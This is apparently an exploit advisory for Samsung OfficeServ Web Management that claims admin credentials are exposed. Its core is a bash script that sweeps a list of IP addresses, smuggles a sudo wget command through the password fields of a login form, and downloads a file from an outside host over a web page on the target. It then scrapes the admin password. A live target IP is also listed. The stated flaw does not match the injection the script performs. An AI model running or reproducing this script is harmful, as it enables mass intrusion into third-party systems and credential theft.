# Title:samsung officeserv Read the users/passwords # Author: MaDo Mokhtar # Contact: codezeroooo[at]yahoo[dot]com # Vendor: http://www.samsung.com # Version: Web Management V 4.12th 2010.04 - Introduction: This converged communication system provides voice, data, wireline, and wireless solutions. Combining its expertise in wireless, communications, core networks, digital technology and IP functionality, Samsung brings you the OfficeServ converged communication system. As a completely converged platform, OfficeServ supports both voice and data communication with powerful, IP-based wired and wireless flexibility. - Vulnerability Explanation: some coders are so stupid.They save the usernames and passwords in text files,UNPROTECTED. - Vulnerable Code Snippet at /contents/general/passwd/passmg.php - Proof of Concept: https://201.192.234.66/contents/general/passwd/passmg.php https://[ip]/contents/general/passwd/passmg.php Bash script to grep the password ===================== #! /bin/bash filecon=(` cat $1 `) for ip in "${filecon[@]}" do echo $ip curl -m3 --insecure --data "sSMELoginID=admin&action=save&passwd1=any+%26%26+%2Fusr%2Fbin%2Fsudo+wget+http%3A%2F%2F85.25.134.46%2Fpassmg.txt+-O+%2Fusr%2Flocal%2Fwww%2Fcontents%2Fgeneral%2Fpasswd%2Fpassmg.php&passwd2=any+%26%26+%2Fusr%2Fbin%2Fsudo+wget+http%3A%2F%2F85.25.134.46%2Fpassmg.txt+-O+%2Fusr%2Flocal%2Fwww%2Fcontents%2Fgeneral%2Fpasswd%2Fpassmg.php" https://${ip}/login/myinfo.php >> tmp.tmp res=$(curl -m3 --insecure https://${ip}/contents/general/passwd/passmg.php | grep old_passwd_0 | cut -d'"' -f6) echo $res echo "found: "${ip}" >> admin <> "$res" <<" >> foserv.res done - Credits: MaDo Mokhtar